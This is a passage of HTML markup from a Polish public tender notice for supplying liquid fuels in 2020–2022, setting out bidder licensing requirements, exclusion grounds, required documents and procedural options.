rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'>2020-07-01 </TD><TD style='border: 1px solid black;border-collapse: collapse;'>2022-06-30</TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">dla wszystkich części - Wykonawca spełni warunek, jeżeli wykaże, że:a)	posiada aktualną koncesję na prowadzenie działalności gospodarczej w zakresie obrotu paliwami ciekłymi wydaną przez Prezesa Urzędu Regulacji Energetyki na podstawie przepisów Ustawy z dnia 10 kwietnia 1997r. – Prawo energetyczne (tekst jedn. Dz. U. z 2019 r., poz. 755 z późn. zm.).Uwaga: W przypadku złożenia oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia – każdy z tych Wykonawców występujących wspólnie, który będzie wykonywał zamówienie w zakresie dostaw, których realizacja wymaga uprawnień wskazanych w Rozdziale XII pkt 3.1.1. lit. a SIWZ, musi wykazać się posiadaniem takich uprawnień. </span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">dla wszystkich części - Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. Wymagane jest złożenie oświadczenia o spełnieniu warunków udziału w postępowaniu na podstawie art. 25a ust. 1 ustawy PZP – odrębnie dla każdej z części przedmiotu zamówienia wg wzoru zał. nr 3, zał. nr 3A, zał. nr 3B i zał. nr 3C do SIWZ.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Dla CZĘŚCI 1, CZĘŚCI 2, CZĘŚCI 3 i CZĘŚCI 4 wymagane jest złożenie oświadczenia o spełnieniu warunków udziału w postępowaniu na podstawie art. 25a ust. 1 ustawy PZP – odrębnie dla każdej z części przedmiotu zamówienia wg wzoru zał. nr 3, zał. nr 3A, zał. nr 3B i zał. nr 3C do SIWZ.UWAGA: Ponadto dla CZĘŚCI 3: Wykonawca spełni warunek, jeżeli wykaże, że: w okresie ostatnich 3 (trzech) lat przed upływem terminu składania ofert, należycie wykonał w okresie jednego roku kalendarzowego lub jeżeli okres jest krótszy, wykonuje dostawy, na łączną wartość minimum 100.000,00 zł brutto – wg wzoru zał. nr 5 do SIWZ.Uwaga:- w przypadku złożenia oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunek udziału w postępowaniu, określony w Rozdziale XII pkt 3.1.3. SIWZ, musi spełniać minimum jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia,- w przypadku, gdy Wykonawca, celem potwierdzenie spełniania warunków udziału w postępowaniu, określonego w Rozdziale XII pkt 3.1.3. SIWZ polega na zdolnościach innych podmiotów, powyższy warunek musi spełniać minimum jeden z tych podmiotów.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow"></span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)</span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">Ważnej koncesji na prowadzenie działalności gospodarczej w zakresie obrotu paliwami ciekłymi wydanej przez Prezesa Urzędu Regulacji Energetyki na podstawie Ustawy z dnia 10 kwietnia 1997r. – Prawo energetyczne (tekst jedn. Dz. U. z 2019 r., poz. 755 z późn. zm.)Dla CZĘŚCI 3, Zamawiający zażąda dokumentów: wykazu wykonanych dostaw, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, należycie wykonał w okresie jednego roku kalendarzowego a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie dostawy na łączną wartość minimum 100.000,00 zł brutto wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz, których dostawy zostały wykonane, oraz załączeniem dowodów określających czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot na rzecz, którego dostawy były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie Wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie. Jeżeli wykaz, oświadczenia lub inne złożone przez Wykonawcę dokumenty będą budzić wątpliwości Zamawiającego, Zamawiający może zwrócić się bezpośrednio do właściwego podmiotu na rzecz, którego dostawy były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, o dodatkowe informacje lub dokumenty w tym zakresie. Wzór wykazu dostaw stanowi zał. nr 5 do SIWZ.8.1.	informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 ustawy wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,8.2.	zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub innego dokumentu potwierdzającego, że Wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, 8.3.	zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub innego dokumentu potwierdzającego, że Wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,8.4.	odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy,8.5.	oświadczenia Wykonawcy o braku wydania wobec niego prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o zaleganiu z uiszczaniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne albo - w przypadku wydania takiego wyroku lub decyzji:- dokumentów potwierdzających dokonanie płatności tych należności wraz z ewentualnymi odsetkami lub grzywnami lub zawarcie wiążącego porozumienia w sprawie spłat tych należności - wg wzoru zał. nr 6 do SIWZ,8.6.	oświadczenia Wykonawcy o braku orzeczenia wobec niego tytułem środka zapobiegawczego zakazu ubiegania się o zamówienia publiczne - wg wzoru zał. nr 7 do SIWZ,8.7.	oświadczenia Wykonawcy o niezaleganiu z opłacaniem podatków i opłat lokalnych, których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (tekst jedn. Dz. U. z 2019 r. poz. 1170 z późn. zm.) - wg wzoru zał. nr 8 do SIWZ.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">Ważnej koncesji na prowadzenie działalności gospodarczej w zakresie obrotu paliwami ciekłymi wydanej przez Prezesa Urzędu Regulacji Energetyki na podstawie Ustawy z dnia 10 kwietnia 1997r. – Prawo energetyczne (tekst jedn. Dz. U. z 2019 r., poz. 755 z późn. zm.)Dla CZĘŚCI 3, Zamawiający zażąda dokumentów: wykazu wykonanych dostaw, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, należycie wykonał w okresie jednego roku kalendarzowego a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie dostawy na łączną wartość minimum 100.000,00 zł brutto wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz, których dostawy zostały wykonane, oraz załączeniem dowodów określających czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot na rzecz, którego dostawy były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie Wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie. Jeżeli wykaz, oświadczenia lub inne złożone przez Wykonawcę dokumenty będą budzić wątpliwości Zamawiającego, Zamawiający może zwrócić się bezpośrednio do właściwego podmiotu na rzecz, którego dostawy były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, o dodatkowe informacje lub dokumenty w tym zakresie. Wzór wykazu dostaw stanowi zał. nr 5 do SIWZ.8.1.	informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 ustawy wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,8.2.	zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub innego dokumentu potwierdzającego, że Wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, 8.3.	zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub innego dokumentu potwierdzającego, że Wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,8.4.	odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy,8.5.	oświadczenia Wykonawcy o braku wydania wobec niego prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o zaleganiu z uiszczaniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne albo - w przypadku wydania takiego wyroku lub decyzji:- dokumentów potwierdzających dokonanie płatności tych należności wraz z ewentualnymi odsetkami lub grzywnami lub zawarcie wiążącego porozumienia w sprawie spłat tych należności - wg wzoru zał. nr 6 do SIWZ,8.6.	oświadczenia Wykonawcy o braku orzeczenia wobec niego tytułem środka zapobiegawczego zakazu ubiegania się o zamówienia publiczne - wg wzoru zał. nr 7 do SIWZ,8.7.	oświadczenia Wykonawcy o niezaleganiu z opłacaniem podatków i opłat lokalnych, których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (tekst jedn. Dz. U. z 2019 r. poz. 1170 z późn. zm.) - wg wzoru zał. nr 8 do SIWZ.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1. formularz oferty stanowiący zał. nr 2 do SIWZ2. załącznik do formularza ofertowego - wyliczenie średniej ceny detalicznej 1 litra oleju napędowego/benzyny bezołowiowej/oleju opałowego z miesiąca marca 2020 r. - wg wzoru zał. nr 2A do SIWZ.	3. aktualne Oświadczenie na dzień składania ofert stanowiące wstępne potwierdzenie spełniania Warunków udziału w postępowaniu oraz braku podstaw do wykluczenia wykonawcy z postępowania odrębnie dla każdej z części przedmiotu zamówienia - zał. nr 3, zał. nr 3A, zał. nr 3B i zał. nr 3C do SIWZ o którym mowa w Rozdziale XIII pkt 1 SIWZ.4. Wykonawca przekazuje również odrębne oświadczenia, o których mowa w zdaniu poprzednim, dotyczące podmiotu trzeciego na zasoby, którego się powołuje - jeżeli dotyczy. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają oświadczenie, o jakim mowa w zdaniu pierwszym – odrębnie dla każdego z nich. 5. zobowiązanie innego podmiotu - tylko jeśli Wykonawca korzysta ze zdolności innych podmiotów w celu wykazania spełniania warunków udziału w postępowaniu,6. pełnomocnictwo/pełnomocnictwa dla osoby/osób podpisujących ofertę (w oryginale w formie pisemnej lub kopii poświadczonej notarialnie za zgodność z oryginałem), jeżeli oferta jest podpisana przez pełnomocnika. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia należy załączyć Pełnomocnictwo Wykonawców wspólnie ubiegających się o udzielenie zamówienia (w oryginale lub potwierdzone notarialnie za zgodność z oryginałem).</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span 